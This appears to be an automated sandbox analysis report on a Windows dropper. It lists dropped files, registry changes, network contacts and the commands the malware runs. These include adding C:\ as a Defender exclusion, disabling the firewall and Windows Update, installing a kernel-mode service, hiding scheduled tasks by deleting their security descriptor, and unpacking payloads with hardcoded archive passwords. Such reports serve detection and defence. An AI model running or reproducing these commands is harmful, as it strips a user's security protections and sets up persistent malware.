Technical Information
- <SYSTEM32>\tasks\kafanbbs
- <SYSTEM32>\tasks\payloadtask1
- <SYSTEM32>\tasks\payloadtask2
- [HKLM\System\CurrentControlSet\Services\MagiskQvmSvc_823888] 'ImagePath' = 'cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "%ProgramFiles(x86)%\Windows NT\tProtect.dll" type...
- [HKLM\System\CurrentControlSet\Services\CleverSoar] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\CleverSoar] 'ImagePath' = '%ProgramFiles(x86)%\Windows NT\tProtect.dll'
- [HKLM\System\CurrentControlSet\Services\MagiskQvmSvc_826212] 'ImagePath' = 'cmd /c start sc start CleverSoar'
- [HKLM\System\CurrentControlSet\Services\MagiskQvmSvc_827273] 'ImagePath' = 'cmd /c start sc start CleverSoar'
- [HKLM\System\CurrentControlSet\Services\MagiskQvmSvc_829238] 'ImagePath' = 'cmd /c start sc start CleverSoar'
- [HKLM\System\CurrentControlSet\Services\MagiskQvmSvc_831188] 'ImagePath' = 'cmd /c start schtasks /create /tn "kafanbbs" /xml "%ProgramFiles(x86)%\Windows NT\task.xml"'
- [HKLM\System\CurrentControlSet\Services\MagiskQvmSvc_832327] 'ImagePath' = 'cmd /c start reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kafanbb...
- [HKLM\System\CurrentControlSet\Services\MagiskQvmSvc_833326] 'ImagePath' = 'cmd /c start reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kafa...
- [HKLM\System\CurrentControlSet\Services\MagiskQvmSvc_864666] 'ImagePath' = 'cmd /c start reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPrompt...
- [HKLM\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
- 'MagiskQvmSvc_823888' cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "%ProgramFiles(x86)%\Windows NT\tProtect.dll" type= kernel start= auto
- 'CleverSoar' %ProgramFiles(x86)%\Windows NT\tProtect.dll
- 'MagiskQvmSvc_826212' cmd /c start sc start CleverSoar
- 'MagiskQvmSvc_827273' cmd /c start sc start CleverSoar
- 'MagiskQvmSvc_829238' cmd /c start sc start CleverSoar
- 'MagiskQvmSvc_831188' cmd /c start schtasks /create /tn "kafanbbs" /xml "%ProgramFiles(x86)%\Windows NT\task.xml"
- 'MagiskQvmSvc_832327' cmd /c start reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kafanbbs" /v Index /t REG_DWORD /d 0 /f
- 'MagiskQvmSvc_833326' cmd /c start reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kafanbbs" /v SD /f
- 'MagiskQvmSvc_864666' cmd /c start reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 5 /f
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'DoNotAllowExceptions' = '00000000'
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- Windows Update
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath 'C:\'"
- '%WINDIR%\syswow64\netsh.exe' advfirewall set allprofiles state off
- '%WINDIR%\syswow64\netsh.exe' firewall set opmode mode=disable profile=ALL
- '%WINDIR%\syswow64\netsh.exe' firewall set opmode mode=disable
- '%WINDIR%\syswow64\net.exe' stop wuauserv
- <SYSTEM32>\cmd.exe
- %TEMP%\is-mok77.tmp\<File name>.tmp
- %ProgramFiles(x86)%\windows nt\winnt.exe
- nul
- %ProgramFiles(x86)%\windows nt\tprotect.dll
- %ProgramFiles(x86)%\windows nt\locale7.dat
- %ProgramFiles(x86)%\windows nt\locale4.dat
- %ProgramFiles(x86)%\windows nt\locale3.dat
- %ProgramFiles(x86)%\windows nt\locale2.dat
- %ProgramFiles(x86)%\windows nt\locale.dat
- %ProgramFiles(x86)%\windows nt\locale7.bin
- %ProgramFiles(x86)%\windows nt\locale4.bin
- %ProgramFiles(x86)%\windows nt\locale3.bin
- %ProgramFiles(x86)%\windows nt\runtime.exe
- %ProgramFiles(x86)%\windows nt\locale2.bin
- %ProgramFiles(x86)%\windows nt\7zr.exe
- %ProgramFiles(x86)%\windows nt\res.dat
- %ProgramFiles(x86)%\windows nt\task.xml
- %ProgramFiles(x86)%\windows nt\hrsw.vbc
- %ProgramFiles(x86)%\windows nt\is-dmpge.tmp
- %ProgramFiles(x86)%\windows nt\is-ejkgi.tmp
- %TEMP%\is-b2451.tmp\update.vac
- %TEMP%\is-b2451.tmp\_isetup\_setup64.tmp
- %TEMP%\is-6p5v3.tmp\<File name>.tmp
- %TEMP%\is-thol1.tmp\update.vac
- %TEMP%\is-thol1.tmp\_isetup\_setup64.tmp
- %ProgramFiles(x86)%\windows nt\locale.bin
- %ALLUSERSPROFILE%\displaysessioncontainers.log
- %ProgramFiles(x86)%\windows nt\tprotect.dll
- %ProgramFiles(x86)%\windows nt\task.xml
- %ProgramFiles(x86)%\windows nt\res.dat
- %ProgramFiles(x86)%\windows nt\locale7.dat
- %ProgramFiles(x86)%\windows nt\locale7.bin
- %ProgramFiles(x86)%\windows nt\locale4.dat
- %ProgramFiles(x86)%\windows nt\locale4.bin
- %ProgramFiles(x86)%\windows nt\locale3.dat
- %ProgramFiles(x86)%\windows nt\locale3.bin
- %ProgramFiles(x86)%\windows nt\locale2.dat
- %ProgramFiles(x86)%\windows nt\locale2.bin
- %ProgramFiles(x86)%\windows nt\locale.dat
- %ProgramFiles(x86)%\windows nt\locale.bin
- %ProgramFiles(x86)%\windows nt\hrsw.vbc
- %ProgramFiles(x86)%\windows nt\file.bin
- %ProgramFiles(x86)%\windows nt\7zr.exe
- %ProgramFiles(x86)%\windows nt\winnt.exe
- %ProgramFiles(x86)%\windows nt\runtime.exe
- %TEMP%\is-thol1.tmp\update.vac
- %TEMP%\is-thol1.tmp\_isetup\_setup64.tmp
- %TEMP%\is-mok77.tmp\<File name>.tmp
- %ProgramFiles(x86)%\windows nt\trash
- <SYSTEM32>\tasks\payloadtask1
- <SYSTEM32>\tasks\payloadtask2
- from %ProgramFiles(x86)%\windows nt\is-ejkgi.tmp to %ProgramFiles(x86)%\windows nt\file.bin
- from %ProgramFiles(x86)%\windows nt\is-dmpge.tmp to %ProgramFiles(x86)%\windows nt\trash
- %ProgramFiles(x86)%\windows nt\trash
- 'qq.##hi7770.com':6666
- 'qq.##hi7770.com':6666
- DNS ASK qq.##hi7770.com
- DNS ASK 80##.#wilight.zip
- '80##.#wilight.zip':8005
- 'localhost':62740
- 'localhost':52758
- '%TEMP%\is-mok77.tmp\<File name>.tmp' /SL5="$5024C,6110134,845824,<Full path to file>"
- '%TEMP%\is-6p5v3.tmp\<File name>.tmp' /SL5="$50244,6110134,845824,<Full path to file>" /VERYSILENT
- '%ProgramFiles(x86)%\windows nt\7zr.exe' x -y res.dat -pad8dtyw9eyfd9aslyd9iald
- '%ProgramFiles(x86)%\windows nt\7zr.exe' x -y locale7.dat -pasfasdf79yf9layslofs
- '%ProgramFiles(x86)%\windows nt\7zr.exe' x -y -bd locale.dat -pfhliafyaiofyaif
- '%ProgramFiles(x86)%\windows nt\winnt.exe'
- '%ProgramFiles(x86)%\windows nt\7zr.exe' x -bd -y locale2.dat -pfhuweihfiluwehfi1
- '%ProgramFiles(x86)%\windows nt\runtime.exe'
- '<SYSTEM32>\taskeng.exe' {C11D7B33-44C5-4823-A54F-B03C71D5CD73} S-1-5-21-3691498038-2086406363-2140527554-1000:eneiobptxz\user:Interactive:[1]
- '%WINDIR%\syswow64\cmd.exe' /q /c SCHTASKS /Create /F /TN "\PayloadTask1" /RU "user" /RL HIGHEST /SC ONCE /ST 00:00 /TR "\"C:\\Program Files (x86)\\Windows NT\\winnt.exe\"" & SCHTASKS /Run /TN "\PayloadTask1" & schtasks /...
- '%WINDIR%\syswow64\schtasks.exe' /Create /F /TN "\PayloadTask1" /RU "user" /RL HIGHEST /SC ONCE /ST 00:00 /TR "\"C:\\Program Files (x86)\\Windows NT\\winnt.exe\""
- '%WINDIR%\syswow64\schtasks.exe' /Run /TN "\PayloadTask1"
- '%WINDIR%\syswow64\sc.exe' config wuauserv start= disabled
- '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "\PayloadTask1" /F
- '%WINDIR%\syswow64\cmd.exe' /q /c 7zr.exe x -bd -y locale2.dat -pfhuweihfiluwehfi1 > NUL 2>&1
- '%WINDIR%\syswow64\cmd.exe' /q /c SCHTASKS /Create /F /TN "\PayloadTask2" /RU "user" /RL HIGHEST /SC ONCE /ST 00:00 /TR "\"C:\\Program Files (x86)\\Windows NT\\runtime.exe\"" & SCHTASKS /Run /TN "\PayloadTask2" & schtasks...
- '<SYSTEM32>\cmd.exe' /c start reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 5 /f
- '%WINDIR%\syswow64\schtasks.exe' /Create /F /TN "\PayloadTask2" /RU "user" /RL HIGHEST /SC ONCE /ST 00:00 /TR "\"C:\\Program Files (x86)\\Windows NT\\runtime.exe\""
- '<SYSTEM32>\cmd.exe' /c start reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kafanbbs" /v SD /f
- '%WINDIR%\syswow64\schtasks.exe' /Run /TN "\PayloadTask2"
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 5 /f
- '<SYSTEM32>\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kafanbbs" /v SD /f
- '<SYSTEM32>\cmd.exe' /c start sc start CleverSoar
- '%WINDIR%\syswow64\schtasks.exe' /Delete /TN "\PayloadTask2" /F
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kafanbbs" /v Index /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c start sc create CleverSoar displayname= CleverSoar binPath= "%ProgramFiles(x86)%\Windows NT\tProtect.dll" type= kernel start= auto
- '%WINDIR%\syswow64\net1.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' create CleverSoar displayname= CleverSoar binPath= "%ProgramFiles(x86)%\Windows NT\tProtect.dll" type= kernel start= auto
- '<SYSTEM32>\sc.exe' start CleverSoar
- '<SYSTEM32>\cmd.exe' /c start schtasks /create /tn "kafanbbs" /xml "%ProgramFiles(x86)%\Windows NT\task.xml"
- '<SYSTEM32>\schtasks.exe' /create /tn "kafanbbs" /xml "%ProgramFiles(x86)%\Windows NT\task.xml"
- '<SYSTEM32>\cmd.exe' /c start reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kafanbbs" /v Index /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\cmd.exe' /q /c 7zr.exe x -y -bd locale.dat -pfhliafyaiofyaif > NUL 2>&1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath 'C:\'"' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall set opmode mode=disable profile=ALL' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall set allprofiles state off' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop wuauserv' (with hidden window)
- '%ProgramFiles(x86)%\windows nt\runtime.exe' ' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall set opmode mode=disable' (with hidden window)
- '%ProgramFiles(x86)%\windows nt\winnt.exe' ' (with hidden window)
- '%ProgramFiles(x86)%\windows nt\7zr.exe' x -y res.dat -pad8dtyw9eyfd9aslyd9iald' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /q /c SCHTASKS /Create /F /TN "\PayloadTask1" /RU "user" /RL HIGHEST /SC ONCE /ST 00:00 /TR "\"C:\\Program Files (x86)\\Windows NT\\winnt.exe\"" & SCHTASKS /Run /TN "\PayloadTask1" & schtasks /...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /q /c 7zr.exe x -y -bd locale.dat -pfhliafyaiofyaif > NUL 2>&1' (with hidden window)
- '%ProgramFiles(x86)%\windows nt\7zr.exe' x -y locale7.dat -pasfasdf79yf9layslofs' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /q /c SCHTASKS /Create /F /TN "\PayloadTask2" /RU "user" /RL HIGHEST /SC ONCE /ST 00:00 /TR "\"C:\\Program Files (x86)\\Windows NT\\runtime.exe\"" & SCHTASKS /Run /TN "\PayloadTask2" & schtasks...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /q /c 7zr.exe x -bd -y locale2.dat -pfhuweihfiluwehfi1 > NUL 2>&1' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config wuauserv start= disabled' (with hidden window)